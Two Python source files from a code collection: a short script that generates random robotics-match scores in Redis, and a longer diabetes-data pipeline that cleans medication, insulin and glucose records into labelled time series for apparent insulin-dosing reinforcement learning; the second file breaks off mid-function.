teams = ['ARG','BWS','BWS2','BGR','BRK','BSG','CLF','CLF2','EMM','GRS','GMR','HRS','HZW','MFG','MUC','PSC','PSC2','QEH','QMC','SEN','SEN2','TTN']
actor = redis.Redis(host='localhost',port=6379,db=0)
def game_points(score):
total = 0
total += int(score[2])
total += 2*int(score[3])
total += 5*int(score[4])
if int(score[5]) > 1:
total *= int(score[5])
return total
for i in range(21):
for j in range(4):
r = int(random.random()*10)
z = int(random.random()*10)
b = int(random.random()*10)
n = int(random.random()*10)%5
s = game_points([0,0,r,z,b,n])
actor.hmset('org.srobo.scores.match.{0}.{1}'.format(i,j),{'trobot':r,'tzone':z,'tbucket':b,'nbuckets':n})
actor.incr('org.srobo.scores.team.{0}'.format(teams[i]),s)
| Scarzy/compd_test | scoremaker.py | scoremaker.py | py | 835 | python | en | code | 2 | github-code | 13 |
42855697480 | #!/usr/bin/env python3
import os
import time
import hashlib
from pathlib import Path
from functools import lru_cache
import logging
import fire
from tqdm import tqdm
import pandas as pd
import numpy as np
BASE_PATH = Path.cwd()
LOG_PATH = BASE_PATH / 'log'
LOG_PATH.mkdir(parents=True, exist_ok=True)
class Logger(object):
def __init__(self, log_level=logging.DEBUG):
self.logname = os.path.join(LOG_PATH, "{}.log".format(time.strftime("%Y-%m-%d")))
self.logger = logging.getLogger("log")
self.logger.setLevel(log_level)
self.formater = logging.Formatter(
'[%(asctime)s][%(filename)s %(lineno)d][%(levelname)s]: %(message)s')
self.filelogger = logging.FileHandler(self.logname, mode='a', encoding="UTF-8")
self.console = logging.StreamHandler()
self.console.setLevel(log_level)
self.filelogger.setLevel(log_level)
self.filelogger.setFormatter(self.formater)
self.console.setFormatter(self.formater)
self.logger.addHandler(self.filelogger)
self.logger.addHandler(self.console)
logger = Logger(log_level=logging.WARNING).logger
logger.info("Start...")
if (__name__ == '__main__') or (__package__ == ''):
from rl import glu2reward
from rl import reward2return
else:
from .rl import glu2reward
from .rl import reward2return
def hash_func(s):
return int(hashlib.md5(s.encode()).hexdigest(), 16)
def func_args_output_helper(args):
func, path, output_path, kargs = args
func(path, output_path, **kargs)
def func_args_stat_helper(args):
func, path, kargs = args
return func(path, **kargs)
def parse_long_list(arg):
"""
parse the long list according to ","
"""
if isinstance(arg, str):
if ',' in arg:
arg = arg.split(',')
else:
arg = [arg]
elif isinstance(arg, tuple):
arg = list(arg)
return arg
def datetime_time_norm(sr, times_bin, times_norm, labels=None):
"""
time part normalization
"""
times_bin = [pd.Timedelta(t) for t in times_bin]
td = sr - sr.dt.floor('d')
sr_norm = pd.cut(td, bins=times_bin, labels=times_norm)
if labels:
sr_label = sr_norm.cat.rename_categories(dict(list(zip(times_norm, labels))))
else:
sr_label = sr_norm
sr = sr.dt.date.astype('str') + ' ' + sr_norm.astype('str')
sr = pd.to_datetime(sr, errors='coerce')
return sr, sr_label
def ts_complete(df, col_datetime, col_timegroup, freq, n_timegroup, col_name='step'):
"""
time series completion
- get a unique time series with two columns: col_datetime and col_timegroup
col_datetime: str
date column
freq: str
frequency, such as:
- 'D'
n_timegroup: int
number of time aggregates per frequency base, such as:
- 7
"""
df = df.copy()
df[col_timegroup] = df[col_timegroup].astype('int')
df[col_datetime] = pd.to_datetime(df[col_datetime])
df['_date'] = df[col_datetime].dt.floor(freq)
df['_date_order'] = ((df['_date'] - df['_date'].min()) / pd.Timedelta(1, unit=freq)).astype('int')
df[col_name] = df['_date_order'] * n_timegroup + df[col_timegroup] # calculate time series order
df[col_name] = df[col_name].astype('int')
df = df.drop_duplicates(col_name) # normal data does not have duplicates
df = df.set_index(col_name)
if len(df) > 0:
df = df.reindex(index=np.arange(df.index.max() + 1)) # complete the time series and complete the sorting
df = df.drop(columns=['_date', '_date_order'])
# complete timegroup
timegroups = np.tile(np.arange(n_timegroup), len(df) // n_timegroup + 1)
df[col_timegroup] = timegroups[:len(df)]
return df
def get_datetime_span(dt, deltas=('7D', '7D')):
"""
get a 14 day time range
t_50 is the median of the time series
t_0 is the starting point
t_100 is the end point
"""
t_50 = dt.quantile(0.5)
t_0 = t_50 - pd.Timedelta(deltas[0])
t_100 = t_50 + pd.Timedelta(deltas[1])
return t_0, t_100
def read_csv_or_df(path, **kargs):
"""
read the dataframe or read the dataframe from a csv file
"""
if isinstance(path, pd.DataFrame):
df = path
else:
df = pd.read_csv(path, **kargs)
return df
def df2map(df, col_key, col_val):
return df.drop_duplicates(col_key).set_index(col_key)[col_val]
def move_cols_follow(df, col_anchor, cols_to_follow):
"""
move cols behind the target column
c1, c2, c_anchor, ..., c_to_follow (col_to_follow can be located anywhere)
-> c1, c2, c_anchor, c_to_follow, ...
"""
if isinstance(cols_to_follow, str):
cols_to_follow = [cols_to_follow]
cols = df.columns.drop(cols_to_follow)
i_anchor = df.columns.get_loc(col_anchor)
cols = list(cols)
cols_new = cols[:i_anchor + 1] + cols_to_follow + cols[i_anchor + 1:]
df_reindex = df.reindex(columns=cols_new)
return df_reindex
def get_day_freq(t_start, t_end, hour, minute):
"""
get time index from t_start to t_end
"""
t_temp = t_start.replace(hour=hour, minute=minute)
if t_temp < t_start:
t_temp = t_temp + pd.Timedelta(1, unit='D')
ts = pd.date_range(start=t_temp, end=t_end, freq='D')
return ts
def get_drug_time(scheme, start_time, days, hour_points=[8, 12, 16, 20]):
"""
get indexs of specific four administration times and corresponding drug categories
"""
t_start = pd.Timestamp(start_time)
t_end = t_start + pd.Timedelta(days, unit='D')
ts = []
for d, h in zip(scheme, hour_points):
# if d != 'None':
if d not in ['无','na']:
ts += [(d, t) for t in get_day_freq(t_start, t_end, hour=h, minute=0)]
return ts
def make_drug_option(scheme, start_time, days, hour_points=[8, 12, 16, 20]):
"""
expand insulin information
"""
points = get_drug_time(scheme, start_time, days, hour_points=hour_points)
df_option = pd.DataFrame(points, columns=['value', 'datetime'])
df_option['key'] = 'insulin_group'
df_option['key_group'] = 'insulin'
# df_option2 = df_option.copy()
# df_option2['value'] = 1
# df_option2['key'] = 'insulin'
# df_option = pd.concat([df_option, df_option2])
return df_option
class DiabetesPipeline(object):
def __init__(self, num_workers=0):
super(DiabetesPipeline, self).__init__()
if num_workers is None:
num_workers = 0
elif num_workers == 0:
num_workers = 1
elif num_workers < 0:
num_workers = -1
self._num_workers = num_workers
def _std_df_output(self, df, output_path, with_suffix=None):
if output_path is None:
return df
elif output_path == 'print':
print(df)
elif output_path == 'skip':
return
else:
output_path = Path(output_path)
if with_suffix:
output_path = output_path.with_suffix(with_suffix)
output_path.parent.mkdir(parents=True, exist_ok=True)
df.to_csv(output_path, index=False)
@lru_cache(10)
def _get_drug_meta(self, path):
"""
get various drug information
drug_meta: all drug information
drug_name2group: list of categories to which the drug belongs
drug_name2min: reasonable min value of corresponding drug
drug_name2max: reasonable max value of corresponding drug
"""
# drug
df_drug_meta = pd.read_excel(path)
# df_drug_meta = df_drug_meta[df_drug_meta['drug'].notna()]
df_drug_meta = df_drug_meta[df_drug_meta['药物类'].notna()]
# df_drug_meta = df_drug_meta.rename(columns={'drug': 'drug_type'})
df_drug_meta = df_drug_meta.rename(columns={'药物类': 'drug_type'})
# df_drug_meta['reasonable min'] = df_drug_meta['reasonable min'].fillna(0)
df_drug_meta['合理min'] = df_drug_meta['合理min'].fillna(0)
# drug_name2group = df2map(df_drug_meta, 'medication (common Name)', 'drug_type')
drug_name2group = df2map(df_drug_meta, '用药(通用名称)', 'drug_type')
# drug_name2min = df2map(df_drug_meta, 'medication (common Name)', 'reasonable min')
drug_name2min = df2map(df_drug_meta, '用药(通用名称)', '合理min')
# drug_name2max = df2map(df_drug_meta, 'medication (common Name)', 'reasonable max')
drug_name2max = df2map(df_drug_meta, '用药(通用名称)', '合理max')
df_drug_meta.head(2)
df_drug_meta.sort_values('size', ascending=False)
return df_drug_meta, drug_name2group, drug_name2min, drug_name2max
def pipeline1_drug(self, input_path, output_path, drug_meta_path, verbose=0):
'''
process the medication information in the input_path file
'''
df_drug_meta, drug_name2group, drug_name2min, drug_name2max = self._get_drug_meta(drug_meta_path)
df_drug = read_csv_or_df(input_path)
df_drug_output = df_drug
# drug category mapping
df_drug_output['drug_group'] = df_drug_output['drug_name'].map(drug_name2group)
if verbose:
pass
# If the category value lacks, but the name contains insulin, it is classified as insulin.
df_drug_output['drug_group'] = df_drug_output['drug_group'].mask(
# df_drug_output['drug_group'].isna() & df_drug_output['drug_name'].str.contains('insulin'), 'insulin')
df_drug_output['drug_group'].isna() & df_drug_output['drug_name'].str.contains('胰岛素'), '胰岛素')
# remove data that is not in the drug list
df_drug_output_t = df_drug_output.dropna(subset=['drug_group'])
df_drug_output = df_drug_output_t
# remove doctor's advice with unreasonable medication values
min_ok = df_drug_output['value'] >= df_drug_output['drug_name'].map(drug_name2min)
max_ok = df_drug_output['value'] <= df_drug_output['drug_name'].map(drug_name2max)
# df_drug_output_t = df_drug_output[(min_ok & max_ok) | df_drug_output['drug_group'].isin(['insulin'])]
df_drug_output_t = df_drug_output[(min_ok & max_ok) | df_drug_output['drug_group'].isin(['胰岛素'])]
df_drug_output = df_drug_output_t
logger.info("medication information processing completed, in total %s items" % df_drug_output.shape[0])
return self._std_df_output(df_drug_output, output_path)
@lru_cache(10)
def _get_insulin_meta(self, path):
'''
get various information about insulin
df_insulin_meta: all insulin information
insulin2group: category table of insulin
insulin_list: insulin list
'''
df_insulin_meta = pd.read_excel(path)
# df_insulin_meta['category brief'] = df_insulin_meta['category'].str.replace('like', '')
df_insulin_meta['类别简'] = df_insulin_meta['类别'].str.replace('类似物',
'') # In terms of category, xxx analogues and xxx are considered to be the same category of drugs
# insulin2group = df2map(df_insulin_meta, 'drug name', 'category brief')
insulin2group = df2map(df_insulin_meta, '药名', '类别简')
# insulin_list = ['None'] + list(sorted(insulin2group.dropna().unique()))
insulin_list = ['无'] + list(sorted(insulin2group.dropna().unique()))
return df_insulin_meta, insulin2group, insulin_list
def pipeline1_insulin(self, input_path, output_path, drug_meta_path, insulin_meta_path):
'''
process the insulin information in the input_path file
'''
df_drug_meta, drug_name2group, drug_name2min, drug_name2max = self._get_drug_meta(drug_meta_path)
df_insulin_meta, insulin2group, insulin_list = self._get_insulin_meta(insulin_meta_path)
df_insulin = read_csv_or_df(input_path)
df_insulin_output = df_insulin
# remove doctor's advice with unreasonable values
df_insulin_output = df_insulin_output[df_insulin_output['value'].between(1, 50)]
df_insulin_output = df_insulin_output[df_insulin_output['drug_group'].isin(['胰岛素', 'insulin'])]
# supplementary drug category Insulin
if df_insulin_output['key'].isin(['insulin_group']).sum() == 0: # avoid duplicate additions
df_insulin_output2 = df_insulin_output.copy()
df_insulin_output2['key'] = 'insulin_group'
df_insulin_output2['key_type'] = 'cat{}({})'.format(len(insulin_list), ','.join(insulin_list))
df_insulin_output2['key_group'] = 'insulin'
df_insulin_output2['value'] = df_insulin_output2['drug_name'].map(insulin2group)
if df_insulin_output2['value'].isna().sum() > 0:
df_na = df_insulin_output2[df_insulin_output2['value'].isna()]
# df_insulin_output2['value'] = df_insulin_output2['value'].fillna('premixed insulin')
df_insulin_output2['value'] = df_insulin_output2['value'].fillna('预混胰岛素')
names = list(df_na['drug_name'].unique())
if isinstance(input_path, str) or isinstance(input_path, Path):
logger.warning(f"insulin mapping missing, unknown short/premixed/long {input_path} {names}")
else:
logger.warning(f"insulin mapping missing, unknown short/premixed/long {df_na.head(2)} {names}")
df_insulin_output = pd.concat([df_insulin_output, df_insulin_output2])
# remove missing values
df_insulin_output = df_insulin_output.dropna(subset=['value'])
logger.info("insulin information processing completed, %s items in total" % df_insulin_output.shape[0])
return self._std_df_output(df_insulin_output, output_path)
@lru_cache(10)
def _get_test_meta(self, path):
'''
get various inspection information
df_test_meta: all inspection information
key2name: Mapping table of inspection and corresponding name
name2lonic: Mapping table of name and corresponding loinc information
'''
df_test_meta = pd.read_excel(path)
cols_test_meta = 'system feature_name loinc component short_name'.split()
cols_local = df_test_meta.columns.drop(cols_test_meta)
key2name = df_test_meta.melt(id_vars='feature_name', value_vars=cols_local, var_name='key_map',
value_name='local_name')
key2name = key2name.drop_duplicates(subset=['key_map', 'local_name'])
key2name = key2name.dropna()
key2name = key2name.set_index(['key_map', 'local_name'])['feature_name']
name2loinc = df2map(df_test_meta, 'feature_name', 'loinc')
return df_test_meta, key2name, name2loinc
def pipeline1_test(self, input_path, output_path, test_meta_path):
'''
process the inspection information in document input_path
'''
df_test_meta, key2name, name2loinc = self._get_test_meta(test_meta_path)
df_test = read_csv_or_df(input_path)
df_test_output = df_test
# inspection index naming standardization
temp = pd.Series(zip(df_test_output['key_map'], df_test_output['key']))
temp = temp.map(key2name)
temp = temp.fillna(df_test_output['key'])
df_test_output['key'] = temp
df_test_output['comment'] = df_test_output['key'].map(name2loinc)
logger.info("inspection information processing completed, %s items in total" % df_test_output.shape[0])
return self._std_df_output(df_test_output, output_path)
def workflow1_merge(self, input_dir, output_path,
drug_meta_path, insulin_meta_path, test_meta_path,
pipeline=['base', 'sym', 'diag', 'drug', 'insulin', 'glu', 'test'],
mapping=True,
):
'''
integrate multiple data information
- Input directory, output file csv
'''
logger.info("start merging patient information")
if isinstance(input_dir, str) or isinstance(input_dir, Path):
input_dir = Path(input_dir)
path_base = input_dir / 'base.sparse.csv'
path_sym = input_dir / 'sym.sparse.csv'
path_diag = input_dir / 'diag.sparse.csv'
path_drug = input_dir / 'drug.sparse.csv'
path_insulin = input_dir / 'insulin.sparse.csv'
path_glu = input_dir / 'glu.sparse.csv'
path_test = input_dir / 'test.sparse.csv'
else:
path_base, path_glu, path_diag, path_test, path_drug, path_insulin, path_sym = input_dir
dfs = []
if isinstance(input_dir, str) or isinstance(input_dir, Path):
input_dir = Path(input_dir)
if ('base' in pipeline) and path_base.exists():
logger.info("process base")
df_base = read_csv_or_df(path_base)
dfs += [df_base]
if ('sym' in pipeline) and path_sym.exists():
logger.info("process sym")
df_sym = read_csv_or_df(path_sym)
dfs += [df_sym]
if ('glu' in pipeline) and path_glu.exists():
logger.info("process glu")
df_glu = read_csv_or_df(path_glu)
dfs += [df_glu]
if ('diag' in pipeline) and path_diag.exists():
df_diag = read_csv_or_df(path_diag)
dfs += [df_diag]
if ('drug' in pipeline) and path_drug.exists():
logger.info("process drug")
if mapping:
df_drug = self.pipeline1_drug(path_drug, None, drug_meta_path=drug_meta_path)
else:
df_drug = read_csv_or_df(path_drug)
dfs += [df_drug]
if ('insulin' in pipeline) and path_insulin.exists():
logger.info("process insulin")
if mapping:
df_insulin = self.pipeline1_insulin(path_insulin, None, drug_meta_path=drug_meta_path,
insulin_meta_path=insulin_meta_path)
else:
df_insulin = read_csv_or_df(path_insulin)
dfs += [df_insulin]
if ('test' in pipeline) and path_test.exists():
logger.info("process test")
if mapping:
df_test = self.pipeline1_test(path_test, None, test_meta_path=test_meta_path)
else:
df_test = read_csv_or_df(path_test)
dfs += [df_test]
else:
if ('base' in pipeline):
df_base = read_csv_or_df(path_base)
dfs += [df_base]
if ('sym' in pipeline):
df_sym = read_csv_or_df(path_sym)
dfs += [df_sym]
if ('glu' in pipeline):
df_glu = read_csv_or_df(path_glu)
dfs += [df_glu]
if ('diag' in pipeline):
df_diag = read_csv_or_df(path_diag)
dfs += [df_diag]
if ('drug' in pipeline):
df_drug = self.pipeline1_drug(path_drug, None, drug_meta_path=drug_meta_path)
dfs += [df_drug]
if ('insulin' in pipeline):
df_insulin = self.pipeline1_insulin(path_insulin, None, drug_meta_path=drug_meta_path,
insulin_meta_path=insulin_meta_path)
dfs += [df_insulin]
if ('test' in pipeline):
df_test = self.pipeline1_test(path_test, None, test_meta_path=test_meta_path)
dfs += [df_test]
if len(dfs) == 0:
logger.warning(f"{input_dir} no records were found for this patient")
df = pd.DataFrame()
else:
df = pd.concat(dfs)
if output_path is None:
return df
elif output_path == 'print':
print(df)
else:
output_path = Path(output_path).with_suffix('.csv')
output_path.parent.mkdir(parents=True, exist_ok=True)
df.to_csv(output_path, index=False)
def pipeline2ext_add_option(self, input_path, output_path, scheme, start_time, days):
'''
add action option
'''
df_sample = read_csv_or_df(input_path)
df_option = make_drug_option(scheme, start_time, days)
df_sample = pd.concat([df_sample, df_option])
return self._std_df_output(df_sample, output_path)
def pipeline2_tnorm(self, input_path, output_path, tnorm_mode):
'''
time point normalization
'''
df_sample = read_csv_or_df(input_path)
df_sample_tnorm = df_sample
if tnorm_mode == 'arm':
times_bin = '04:30:00 10:00:00 15:00:00 18:50:00 23:59:59'.split()
times_norm = '06:00:00 10:30:00 16:30:00 21:00:00'.split()
labels = '0 2 4 6'.split()
elif tnorm_mode == 'fulltime':
times_bin = '04:30:00 08:11:00 09:30:00 12:11:00 15:00:00 18:00:00 20:00:00 23:59:59'.split()
times_norm = '06:00:00 08:30:00 10:30:00 13:00:00 16:30:00 19:00:00 21:00:00'.split()
labels = '0 1 2 3 4 5 6'.split()
df_sample_tnorm['datetime'] = pd.to_datetime(df_sample_tnorm['datetime'])
sr_datetime, sr_datetime_label = datetime_time_norm(df_sample_tnorm['datetime'], times_bin, times_norm, labels)
df_sample_tnorm['datetime_norm'] = sr_datetime
df_sample_tnorm['timegroup'] = sr_datetime_label
df_sample_tnorm = move_cols_follow(df_sample_tnorm, 'datetime', ['datetime_norm', 'timegroup'])
logger.info("time point normalization completed")
return self._std_df_output(df_sample_tnorm, output_path)
@lru_cache(10)
def _get_feat_meta(self, path):
'''
obtain all feature information
and segment features based on continuous and discrete attributes
'''
if isinstance(path, pd.DataFrame):
df_feat_meta = path
else:
df_feat_meta = pd.read_csv(path)
df_meta_to_cont = df_feat_meta[df_feat_meta['key_type'] == 'cont']
df_meta_to_cat = df_feat_meta[df_feat_meta['key_type'].str.contains('^cat')]
return df_feat_meta, df_meta_to_cont, df_meta_to_cat
def pipeline2_ftcrop(self, input_path, output_path, feat_meta_path,
keygroup_specific=[], dt_deltas=('14D', '14D'),
col_datetime='datetime_norm',
):
'''
feature and time tailoring
'''
df_feat_meta, df_meta_to_cont, df_meta_to_cat = self._get_feat_meta(feat_meta_path)
df_sample = read_csv_or_df(input_path)
# feature tailoring
df_sample_crop = df_sample
if not ('feat_name' in df_sample_crop):
df_sample_crop['feat_name'] = df_sample_crop['key_group'] + '|' + df_sample_crop['key']
feat_names = df_sample_crop['feat_name'].tolist() + ['insulin|insulin', 'insulin|insulin_group']
df_sample_crop = df_sample_crop[df_sample_crop['feat_name'].isin(feat_names)]
# time tailoring
if len(keygroup_specific) > 0:
dt = df_sample_crop[col_datetime][df_sample_crop['key_group'].isin(keygroup_specific)]
else:
dt = df_sample_crop[col_datetime]
dt_begin, dt_end = get_datetime_span(dt, deltas=dt_deltas)
df_sample_crop = df_sample_crop[df_sample_crop['datetime_norm'].between(dt_begin, dt_end)]
logger.info("feature filtering completed")
return self._std_df_output(df_sample_crop, output_path)
def pipeline2_ts_flatten(self, input_path, output_path,
max_steps=None,
freq='D', n_timegroup=7, max_duration='60D',
col_datetime='datetime_norm', col_timegroup='timegroup',
# col_key='key',col_value='value',col_key_type='key_type',
col_key_group='key_group', col_key='key', col_value='value',
):
'''
Need to be completed before time flattening:
- time point normalization
- feature filtering
- time span truncation
'''
df_sample = read_csv_or_df(input_path)
df_ts = df_sample
df_ts[col_datetime] = pd.to_datetime(df_ts[col_datetime])
# rename features(name + type)
df_ts[col_key] = df_ts[col_key_group] + '|' + df_ts[col_key]
# flatten features
df_ts = df_ts.pivot_table(index=[col_datetime, col_timegroup], columns=col_key, values=col_value,
aggfunc='first')
df_ts = df_ts.reset_index()
df_ts.columns.name = None
# sequential normalization
tmin, tmax = df_ts[col_datetime].min(), df_ts[col_datetime].max()
max_duration = pd.Timedelta(max_duration)
if (tmax - tmin).days > max_duration.days:
raise Exception(f'Data duration {tmax - tmin} exceeds the limitation of {max_duration}')
if len(df_ts) > 0:
df_ts = ts_complete(df_ts, col_datetime, col_timegroup, freq, n_timegroup)
df_ts = df_ts.reset_index(drop=False)
# truncation
if max_steps is not None:
n_interval = n_timegroup
if n_interval is None:
n_interval = 1
weight = df_ts.notna().sum(axis=1) - 3
weight = weight / max(weight.sum(), 1)
pos = (weight * np.arange(len(weight))).sum()
index_s = max(0, int(pos - max_steps // 2))
index_s = index_s // n_interval * n_interval
index_e = min(index_s + max_steps, len(df_ts))
df_ts = df_ts.iloc[index_s:index_e]
logger.info("time flattening completed")
return self._std_df_output(df_ts, output_path)
def workflow2_ts(self, input_path, output_path, feat_meta_path, keygroup_specific=['insulin', 'glu'],
dt_deltas=('14D', '14D')):
'''
normalize features and time into sequential features
'''
logger.info("start acquiring sequential feature")
df_sample = read_csv_or_df(input_path)
key_groups = ['drug', 'insulin']
df_sample_base = df_sample[~df_sample['key_group'].isin(key_groups)].copy()
df_sample_drugs = df_sample[df_sample['key_group'].isin(key_groups)].copy()
df_sample_base = self.pipeline2_tnorm(df_sample_base, None, tnorm_mode='fulltime')
df_sample_drugs = self.pipeline2_tnorm(df_sample_drugs, None, tnorm_mode='arm')
df_sample = pd.concat([df_sample_base, df_sample_drugs])
df_sample = self.pipeline2_ftcrop(df_sample, None, feat_meta_path=feat_meta_path,
keygroup_specific=keygroup_specific, dt_deltas=dt_deltas,
col_datetime='datetime_norm', )
df_sample = self.pipeline2_ts_flatten(df_sample, None, col_datetime='datetime_norm')
for col in df_sample.columns:
if df_sample[col].dtype.name in ['int64', 'datetime64[ns]']:
continue
df_sample[col] = pd.to_numeric(df_sample[col], errors='ignore')
return self._std_df_output(df_sample, output_path)
def pipeline31_fillna(self, input_path, output_path, feat_meta_path, return_mask=False):
'''
zero padding according to the continuous and discrete nature of the feature
'''
logger.info("fill feature with zero")
df_feat_meta, df_meta_to_cont, df_meta_to_cat = self._get_feat_meta(feat_meta_path)
df_sample = read_csv_or_df(input_path)
df_case = df_sample
df_case = df_case.reindex(columns=df_feat_meta['feat_name'])
df_mask = df_case.notna()
for _, sr_col in df_feat_meta.iterrows():
col = sr_col['feat_name']
interp = sr_col['interp']
feat_type = sr_col['key_type']
val = df_case[col]
if interp == 'ffill':
val = val.interpolate(method='ffill')
val = val.interpolate(method='bfill')
val = val.fillna(0)
df_case[col] = val
if return_mask:
return df_case, df_mask
else:
return self._std_df_output(df_case, output_path)
def pipeline31_delay(self, input_path, output_path, feat_meta_path):
# delayed observation
df_sample = read_csv_or_df(input_path)
df_case = df_sample
df_feat_meta, df_meta_to_cont, df_meta_to_cat = self._get_feat_meta(feat_meta_path)
for _, sr_col in df_feat_meta[['feat_name', 'delay']].iterrows():
col = sr_col['feat_name']
delay = sr_col['delay']
val = df_case[col]
if (delay > 0) and (len(val) > 0):
v = np.concatenate([np.zeros([delay], dtype=val.dtype), val.values[:-delay]])
val = pd.Series(v, index=val.index)
df_case[col] = val
return df_case
def pipeline31_onehot(self, input_path, output_path, feat_meta_path, feature_reindex=True):
'''
process features, expand discrete features with one hot
'''
logger.info("expand discrete features")
df_sample = read_csv_or_df(input_path)
df_feat_meta, df_meta_to_cont, df_meta_to_cat = self._get_feat_meta(feat_meta_path)
df_case = df_sample
feats = []
if feature_reindex:
feats += [df_case.reindex(columns=df_meta_to_cont['feat_name'])]
else:
cols_cont = df_case.columns[df_case.columns.isin(df_meta_to_cont['feat_name'])]
feats += [df_case.reindex(columns=cols_cont)]
if feature_reindex:
df_meta_to_cat_t = df_meta_to_cat
else:
df_meta_to_cat_t = df_meta_to_cat[df_meta_to_cat['feat_name'].isin(df_case.columns)]
for _, sr_col in df_meta_to_cat_t.iterrows():
col = sr_col['feat_name']
vals = df_case[col]
if not pd.isna(sr_col['cat']):
cats = sr_col['cat'].split(',')
cat2id = {c: i for i, c in enumerate(cats)}
vals = vals.map(cat2id)
vals = pd.Categorical(vals, categories=np.arange(sr_col['n_dim']))
vals = pd.get_dummies(vals)
vals = vals.add_prefix(col + '_')
feats += [vals]
df_case = pd.concat(feats, axis=1)
return self._std_df_output(df_case, output_path)
def workflow31_preprocess(self, input_path, output_path, feat_meta_path,
add_mask=False,
add_timegroup=False, col_timegroup='timegroup', n_timegroup=7,
):
'''
sequential feature preprocessing(filling, delay, discrete features, one hot)
- fill missing value
- feature delay
- categorical feature expansion
- the time dimension remains unchanged, the feature dimension changes
'''
logger.info("start sequential feature preprocessing")
df_case = read_csv_or_df(input_path)
df_feat, df_mask = self.pipeline31_fillna(df_case, None, feat_meta_path, return_mask=True)
df_feat = self.pipeline31_onehot(df_feat, None, feat_meta_path, feature_reindex=True)
# add mask feature
if add_mask:
df_feat = pd.concat([df_feat, df_mask.add_suffix('_notna').astype('int')], axis=1)
# add timegroup tag feature
if add_timegroup:
df_time = pd.Categorical(df_case[col_timegroup], categories=np.arange(n_timegroup))
df_time = pd.get_dummies(df_time)
df_feat = pd.concat([df_feat, df_time.add_prefix('timegroup_').astype('int')], axis=1)
return self._std_df_output(df_feat, output_path)
def pipeline32_reward(self, input_path, output_path, col_glu='glu|glu', reward_dtype='risk', gamma=0.9):
'''
add reward return
'''
df_sample = read_csv_or_df(input_path)
df_case_labeled = df_sample
df_case_labeled['reward'] = glu2reward(df_case_labeled[col_glu], dtype=reward_dtype)
df_case_labeled['return'] = reward2return(df_case_labeled['reward'], gamma=gamma)
df_case_labeled['_col_glu'] = df_case_labeled[col_glu]
return self._std_df_output(df_case_labeled, output_path)
def pipeline32_action(self, input_path, output_path,
col_insulin_dose='insulin|insulin', insulin_max=49,
col_insulin_cat='insulin|insulin_group', option_max=4,
):
'''
add action option
match five types of insulin to 1-3
'''
option_map = {
'短效胰岛素': 1,
'速效胰岛素': 1,
'中效胰岛素': 2,
'预混胰岛素': 2,
'长效胰岛素': 3,
'Short-acting insulin': 1,
'Rapid-acting insulin': 1,
'Medium-acting insulin': 2,
'Premixed insulin': 2,
'Long-acting insulin': 3,
'short': 1,
'rapid': 1,
'medium': 2,
'premixed': 2,
'long': 3,
}
df_sample = read_csv_or_df(input_path)
df_case_labeled = df_sample
if (col_insulin_dose not in df_case_labeled) and (col_insulin_cat not in df_case_labeled):
logger.warning(f"no insulin data input")
pass
if col_insulin_dose in df_case_labeled:
# interpolate dose with zero and normalize it
df_case_labeled['action'] = df_case_labeled[col_insulin_dose].fillna(0).astype('int')
df_case_labeled['action'] = df_case_labeled['action'].clip(0, insulin_max)
else:
df_case_labeled['action'] = 0
if col_insulin_cat in df_case_labeled:
# map, supplement, and normalize options
df_case_labeled['option'] = df_case_labeled[col_insulin_cat].map(option_map).fillna(0).astype('int')
df_case_labeled['option'] = df_case_labeled['option'].clip(0, option_max)
else:
df_case_labeled['option'] = 0
return self._std_df_output(df_case_labeled, output_path)
def pipeline32_glu_label(self, input_path, output_path,
col_glu='glu|glu',
glu_min=3.9, glu_max=10,
n_lookaheads=[7, 14, 21], labels=['glu<3', 'glu>11', '3>glu>11']
):
df_sample = read_csv_or_df(input_path)
df_case_labeled = df_sample
df_case_labeled['glu<3'] = (df_case_labeled[col_glu] < glu_min).astype('int')
df_case_labeled['glu<3'] = df_case_labeled['glu<3'].mask(df_case_labeled[col_glu].isna(), np.nan)
df_case_labeled['3>glu>11'] = (~df_case_labeled[col_glu].between(glu_min, glu_max)).astype('int')
df_case_labeled['3>glu>11'] = df_case_labeled['3>glu>11'].mask(df_case_labeled[col_glu].isna(), np.nan)
df_case_labeled['glu>11'] = (df_case_labeled[col_glu] > glu_max).astype('int')
df_case_labeled['glu>11'] = df_case_labeled['glu>11'].mask(df_case_labeled[col_glu].isna(), np.nan)
for col_env in labels:
sr_event = df_case_labeled[col_env]
for n_lookahead in n_lookaheads: # lookahead n time points
temp = sr_event[::-1].rolling(n_lookahead, 1, closed='left').sum()[::-1]
temp = (temp > 0).astype('int')
col_target = f'label_{col_env}_h{n_lookahead}'
df_case_labeled[col_target] = temp
# at the end , the length of time is at least greater than the half
df_case_labeled[col_target] = df_case_labeled[col_target].mask(
df_case_labeled['step'] > (len(df_case_labeled) - n_lookahead // 2), np.nan)
return self._std_df_output(df_case_labeled, output_path)
def workflow2_merge_ts(self, input_dir, output_path,
drug_meta_path, insulin_meta_path, test_meta_path, feat_meta_path,
pipeline=['base', 'sym', 'diag', 'drug', 'insulin', 'glu', 'test'],
skip_empty=False, mapping=True,
):
try:
df_sample = self.workflow1_merge(input_dir, None, drug_meta_path, insulin_meta_path, test_meta_path,
mapping=mapping)
# print(df_sample)
df_sample = self.workflow2_ts(df_sample, None, feat_meta_path)
if skip_empty and (len(df_sample) == 0):
output_path = 'skip'
return self._std_df_output(df_sample, output_path, with_suffix='.csv')
except Exception as e:
print(input_dir)
print(e)
return None
def workflow_total(self, input_dir, output_dir, meta_dir): # for debug
meta_dir = Path(meta_dir)
# drug_meta_path = meta_dir / '20210607 list of hypoglycemic drugs.xlsx'
drug_meta_path = meta_dir / '20210607降糖药列表.xlsx'
# insulin_meta_path = meta_dir / '20220216 insulin classification.xlsx'
insulin_meta_path = meta_dir / '20220216胰岛素分类类别.xlsx'
# test_meta_path = meta_dir / '20220117 inspection indicators mapping table.xlsx'
test_meta_path = meta_dir / '20220117检验指标映射表.xlsx'
feat_meta_path = meta_dir / 'task.columns.csv'
pipeline = ['base', 'sym', 'diag', 'drug', 'insulin', 'glu', 'test'],
skip_empty = False
output_dir = Path(output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
output_path1 = output_dir / 'data.1.1.merge.csv'
output_path2 = output_dir / 'data.2.1.ts.csv'
output_path3 = output_dir / 'data.3.1.preprocess.csv'
output_path4 = output_dir / 'data.4.1.label.csv'
self.workflow1_merge(input_dir, output_path1, drug_meta_path, insulin_meta_path, test_meta_path)
self.workflow2_ts(output_path1, output_path2, feat_meta_path)
self.workflow31_preprocess(output_path2, output_path3, feat_meta_path, add_mask=True, add_timegroup=True,
col_timegroup='timegroup', n_timegroup=7)
df_temp = self.pipeline32_reward(output_path3, None)
